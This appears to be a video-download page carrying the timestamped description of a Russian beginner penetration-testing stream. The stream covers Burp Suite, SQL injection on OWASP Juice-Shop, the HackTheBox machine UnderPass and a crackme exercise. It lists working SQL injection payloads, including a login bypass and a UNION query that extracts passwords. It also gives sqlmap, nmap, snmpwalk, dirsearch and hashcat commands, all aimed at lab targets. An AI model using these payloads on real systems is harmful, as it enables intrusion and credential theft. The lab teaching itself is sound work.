У нас вы можете посмотреть бесплатно Матрешка белого хакера; Burp Community INSTALL, Juice-Shop, SQLmap; UnderPass.htb; Crackmes.one или скачать в максимальном доступном качестве, видео которое было загружено на ютуб. Для загрузки выберите вариант из формы ниже:
                        Если кнопки скачивания не
                            загрузились
                            НАЖМИТЕ ЗДЕСЬ или обновите страницу
                        
                        Если возникают проблемы со скачиванием видео, пожалуйста напишите в поддержку по адресу внизу
                        страницы. 
                        Спасибо за использование сервиса ClipSaver.ru
                    
0:00 Матрешка белого хакера 3:40 Умение гуглить 🐧Кто не клал прод, не сеньор!👾 Сборка из различных ChatGPT ❓Как сканировать nmap, чтобы не положить сервер? → В codeshare после Timecode❗ 6:09 ping -c4 8.8.8.8 Download Burp Suite Community Edition chmod +x burpsuite_community_linux_v2024_12_1.sh ./burpsuite_community_linux_v2024_12_1.sh 23:06 MIRO доска: Теория WEB 31:44 MIRO: Как клиент взаимодействует с веб-страницей или веб-сервер 33:00 MIRO: Принцип работы Burp'а 35:16 OWASP Top 10 ([Ctrl+f: owasp] Модули: ) 37:45 OWASP Juice-Shop: Разбор 2 инъекций Гуглить install: github owasp juice shop OR docker hub owasp juice shop ▶Протокол QUIC (Quick UDP Internet Connections) ▶Postman analogue Burp'a 37:55 Juice-Shop: внимательно осматриваем Inspect(F12)/Console и запускаем Burp Proxy 43:45 Payload имеет несколько форматов binary (в картинеу), JSON, Raw (текст)... (Модули [Ctrl+f: json или ...]) HTTP Headers and Методы ([Ctrl+f: header или методы] Модули ...) 45:21 Настройка шрифта в бурп: Settings/User Interface/Message editor/HTTP message editor: Change font… 17?/OK Settings/User Interface/Display/Appearance: Font size 17?_Dark? 1:01:00 MIRO: Как работает СУБД и SQLi ([Ctrl+f: Реляционная база данных] Модуль 9) 1:14:08 Гуглить: github sql injection payload list wordlists -h 1:17:50 Ответ SQL запроса ([Ctrl+f: sql, БД, базы данных, базами данных, база данных] Модули: ) 1:25:06 Экранирование Frontend'ом? ([Ctrl+f: экранирование] Модули 13, 15, 16) SQL запрос: SELECT * FROM Users WHERE email = '' OR true -- ' AND password='' Email: ' OR true -- 1:30:55 $ sqlmap -u 'http://localhost:8080/rest/products/search?q=skf' -p 'q' --dbms='sqlite' --risk 2 --level 2 --batch --flush-session --ignore-code 500 -t results.txt ▶search?q=')) UNION SELECT NULL,email,password,NULL,NULL,NULL,NULL,NULL,NULL FROM Users-- 1:57:40 dirsearch -u http://127.0.0.1:8080/ -r -x 500,401,404 -w /usr/share/wordlists/dirb/common.txt Inspect/F12: Debugger 2:08:44 Как проходит собеседование? 2:17:31 MIRO: Криптография - salt:hash:pepper, Symmetric-key algorithms (RSA: Public-key cryptography, or asymmetric cryptography), DES, AES, Base64, ASCII; DNS over HTTPS (DoH) ([Ctrl+f: хэш, des, aes] Модули шифрование: A2.8, 7, 20, 33, 34, 37, 39; 42; хэш: 9, 10, 15, 17, 30, 38) ▶Генератор хеша MD5, SHA1, SHA2, SHA3, RIPEMD: https://katvin.com/tools/hash-generat... 2:28:30 UnderPass https://www.hyhforever.top/htb-underp... 2:46:10 Гуглить примеры отчетов: public pentest report 2:54:20 nmap -sS -v -sU underpass.htb //Output 2:57:58 snmpwalk -v2c -c public underpass.htb 3:03:38 daloradius server install default list users SQLmap запускать? 3:10:10 hashcat "hash" -m 0 /absolute_path/rockyou.txt 3:12:31 ssh [email protected] 3:15:55 Beginner Reverse Engineering https://crackmes.one/crackme/62dd26f3... unzip 62dd26f333c5d44a934e994e.zip password : crackmes.one vi 'Crack Me.exe' # Выход из vi - :q Enter $ hexedit 'Crack Me.exe' # Выйти из hexedit - Ctrl+с (без сохранения) ; F10, Ctrl+x $ strings 'Crack Me.exe' $ strings Crack\ Me.exe | grep password $ strings Crack\ Me.exe | grep == 3:27:18 Можно попатчить файлы, поменять байты, которые выводят строку какую-нибудь. Пока не подписан файл, любое изменение возможны. Важно не менять первые байты, потому что в любых файлах есть сигнатуры. Хедеры файла/Сигнатуры показывают допустим, что файлик является исполняемым для Windows или Linux. Хедеры файла нельзя менять, потому что он потом не запуститься. 3:29:05 Обратный реверс это больше про DEBUG/debugging/debugger Точка останова (breakpoint) - посмотреть что находится в памяти/стек/Значение переменых/дальнейшие инструкции: ▶В целом выбираете любой из уровня сложности "1-3" и можете пробовать ковырять. Смотрите только на архитектуру - должна соотноситься с архитектурой вашего процессора. Для того, чтобы более высокие уровни сложности решать, нужно научиться работать с дебаггерами (Ollydbg/GDB, например). На интенсиве мы с этими инструментами не успели поработать 3:33:42 Sandbox ([Ctrl+f: sabdbox] Модули: 7, 15) Под "песочницей" понимается среда, которая является "чистой", т.е. не содержит ни ваших личных файлов, ни связи с вашей домашней/корпоративной сетью. В рамках домашнего пользования описанный вами сценарий вполне подойдёт. Для корпоративных сред есть корпоративные программные комплексы, потому что, по-правде говоря, докер так себе защита от хорошо написанного ВПО, на троечку ________ 📖Содержание + допы: https://codeshare.io/64B jKp 🐦🔥 0-8 БЛОКИ {43 Модуля} для поиска Ctrl+f: https://drive.google.com/file/d/1RXDP... __________ 🔊How To Make Google Docs Read To You (Read Text Aloud): • How To Make Google Docs Read To You (Read ... • How To Make Google Docs Read Text Aloud To... 🔊How to use Microsoft Edge Read Aloud Feature: • How to use Microsoft Edge Read Aloud Feature 🔊Как установить переводчик видео из Яндекс Браузер в Google Chrome, Firefox: • Как установить переводчик видео из Яндекс ...